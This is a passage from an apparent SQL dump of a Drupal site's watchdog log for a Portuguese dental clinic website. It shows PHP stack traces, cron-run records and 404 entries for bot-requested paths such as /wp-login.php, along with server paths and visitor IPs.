Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580377017),(4563,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11360:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580377017),(4564,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:13:\"/wp-login.php\";}',4,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4565,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4566,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:6:\"9.39ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4567,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"14.35ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4568,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"2.63ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4569,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"22.32ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4570,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.29ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4571,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"3.73ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4572,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:5:\"1.2ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4573,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"15.62ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4574,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"18.43ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4575,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"58.51ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4576,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/wp-login.php','','165.22.35.21',1580402614),(4577,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:177:\"/ms/view/directions.ajah?siteId=47353&listingId=54183&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Fservicos-clinicos-4700-311-braga%252Fms-90047454-p-2%252F\";}',4,'','http://clidentcastelo.pt/ms/view/directions.ajah?listingId=54183&siteId=47353&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Fservicos-clinicos-4700-311-braga%252Fms-90047454-p-2%252F','','216.244.66.249',1580404936),(4578,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421018),(4579,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"71.28ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4580,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"18.21ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4581,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"3.09ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4582,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"27.78ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4583,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.14ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4584,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"6.17ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4585,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"1.66ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4586,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"20.81ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4587,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"28.89ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4588,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"85.62ms\";}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4589,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/database/print.css','','185.234.217.88',1580421019),(4590,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:131:\"/ms/view/sendEmail.html?listingId=54183&pageId=126566&emailIndex=0&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt\";}',4,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580427598),(4591,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4592,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"12.31ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4593,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"18.22ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4594,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"2.63ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4595,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"38.25ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4596,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.97ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4597,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"4.98ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4598,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"1.84ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4599,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"21.37ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4600,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"27.59ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4601,0,'cron','Execution of 